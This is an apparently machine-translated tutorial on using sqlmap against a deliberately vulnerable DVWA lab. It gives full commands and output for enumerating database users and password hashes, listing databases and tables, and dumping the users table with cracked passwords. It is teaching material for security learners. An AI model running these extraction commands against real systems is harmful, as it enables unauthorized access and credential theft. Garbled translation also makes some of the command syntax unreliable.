Getting started with SQL injection SQLMAP

What is Sqlmap?

Sqlmap is a free open source tool used to detect and exploit SQL injection vulnerabilities, with a very good feature, i.e. automated processing of detection and utilization (database fingerprint, access to the underlying file system, execute command).

Readers can download Sqlmap source via the official website at SourceForge: http://sourceforge.net/projects/sqlmap/

Who is the author of Sqlmap?

Bernardo Dameleassumpcao Guimaraes (@inquisb), the reader can get in touch with him through bernardo@sqlmap.org, Miroslav Stampar (@stamparm) The reader can contact him through miroslav@sqlmap.org.

At the same time, readers can also contact all developers of sqlmap through dev@sqlmap.org.

What is the command to execute Sqlmap?

Enter the directory where sqlmap.py is located and execute the following command:

#python sqlmap.py-h

The list of options is too long, and there are some differences with the latest version, so this is no longer listed, please download the latest version on your own machine to see it.

The Sqlmap command options are categorized as target options, request options, optimizations, injections, detections, tricks (techniques), fingerprints, enumerations, and so on.

How to use Sqlmap:

To facilitate the demo, we created two virtual machines:

1. The victim machine, the Windows XP operating system, runs a Web server while running a Web application that contains vulnerabilities (DVWA).

2, the attack machine, using Ubuntu 12.04, including Sqlmap program.

Objective of this experiment: use Sqlmap to get the following information:

3, enumerate the MySQL username and password.

4, enumerate all databases.

5, enumerate the data tables of the specified database.

6. Enumerates all user names and passwords in the specified datasheet.

Before using Sqlmap we get information such as the current session cookie, which is used to maintain the connection state during the infiltration process, which is obtained using the add-on named "Tamperdata" in Firefox.

The currently obtained cookie is "security=high;" Phpsessid=57p5g7f32b3ffv8l45qppudqn3″.

For ease of demonstration, we set the DVWA security level to Low:

Next we go to the "SQL Injection" section of the page and enter any value and submit. You can see the ID parameters for the GET request as follows:

"Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

So the page is our target page.

The following commands can be used to retrieve the current database and the current user:

"./sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "–cookie=" phpsessid= 57p5g7f32b3ffv8l45qppudqn3;security=low "-b–current-db–current-user"

Use options:

1. –cookie: Set Our cookie value "to set DVWA security level from high to low"

2.-u: Specify target URL

3.-B: Get DBMS Banner

4, –current-db: Get the current database

5, –current-user: Get the current user

The results are as follows:

You can see the results as follows:

Dbms:mysqlversion 5.0

OS Versionubuntu 12.04

Current User:root

Current DB:D VWA

The following command enumerates all the DBMS users and password hashes, and can crack the password hash in a further attack:

"Sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "--cookie=" phpsessid= 57p5g7f32b3ffv8l45qppudqn3;security=low "--string=" Surname "--users--password"

Use options:

1, –string: When the query is available to match the string in the page

2. –users: Enumerate DBMS users

3. –password: Enumerate DBMS user password hash

The results are as follows:

[*] "@ ' KINGASMK '

[*] "@ ' localhost '

[*] ' debian-sys-maint ' @ ' localhost '

[*] ' phpmyadmin ' @ ' localhost '

[*] ' root ' @ ' 127.0.0.1′

[*] ' Root ' @:: 1′

[*] ' root ' @ ' KINGASMK '

[*] ' root ' @ ' localhost '

Database management system user and password hash:

Password hash:*c30441e06530498bc86019bf3211b94b3bab295a

[*] phpmyadmin[1]:

Password hash:*c30441e06530498bc86019bf3211b94b3bab295a

[*] Root [4]:

Password Hash: *c30441e06530498bc86019bf3211b94b3bab295a

Password hash:*c30441e06530498bc86019bf3211b94b3bab295a

Password hash:*c30441e06530498bc86019bf3211b94b3bab295a

Password hash:*c30441e06530498bc86019bf3211b94b3bab295a

Readers can use Cain&abel, John&ripper and other tools to break the password hash into plaintext. The following command enumerates all database schemas in the system:

"Sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "

--cookie= "Phpsessid=57p5g7f32b3ffv8l45qppudqn3;security=low"--dbs "

Use options:

–dbs: Enumerating databases in a DBMS

The results are as follows:

[*]dvwa

[*]information_schema

[*]mysql

[*]performance_schema

[*]phpmyadmin

Here we try to enumerate the DVWA data tables and execute the following command:

"Sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "--cookie=" phpsessid= 57p5g7f32b3ffv8l45qppudqn3;security=low "-D dvwa--tables"

Use options:

1.-D: DBMS database to enumerate

2, –tables: Enumerate the data tables in the DBMS database

The results were as follows:

Database:dvwa

[2 tables]

+ ———— +

| Guestbook |

| Users |

+ ———— +

The following gets the columns for the user table, as follows:

"Sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "--cookie=" phpsessid= 57p5g7f32b3ffv8l45qppudqn3;security=low "-D dvwa-t users--columns"

Use options:

-T: DBMS database table to enumerate

–columns: Enumerates all columns in a DBMS database table

The results are as follows:

Database:dvwa

Table:users

[6 columns]

+ ———— + ————-+

| Column | type|

+ ———— + ————-+

| Avatar |varchar (70) |

| First_Name |varchar (15) |

| Last_Name |varchar (15) |

| Password |varchar (32) |

| User |varchar (15) |

| USER_ID |int (6) |

+ ———— + ————-+

As shown above, these are the columns we are interested in, representing the username and password. The contents of each column are extracted below. Run the following command to dump all user names and passwords in the user and password table:

"Sqlmap.py-u" Http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit "–cookie=" phpsessid= 57p5g7f32b3ffv8l45qppudqn3; Security=low "-D dvwa-t users-c User,password--dump"

Use options:

-T: DBMS data table to enumerate

-C: Columns in the DBMS data table to enumerate

–dump: Dump DBMS data table entries

Sqlmap will ask whether to crack the password, press ENTER to confirm:

Get all username and plaintext passwords as follows:

Table:users

[5 Entries]

+ ——— + ——— + ——————————————— +

| user_id | user| password |

+ ——— + ——— + ——————————————— +

| 1 | admin | 5F4DCC3B5AA765D61D8327DEB882CF99 (password) |

| 2 | Gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |

| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (Charley) |

| 4 | Pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (Letmein) |

| 5 | Smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+ ——— + ——— + ——————————————— +

Then we can use Admin account login to do anything.

Summarize:

Sqlmap is a very powerful tool that can be used to simplify operations and automate SQL injection detection and utilization.

[Via Infosecinstitute]

Note : More wonderful tutorials Please pay attention to the triple tutorial channel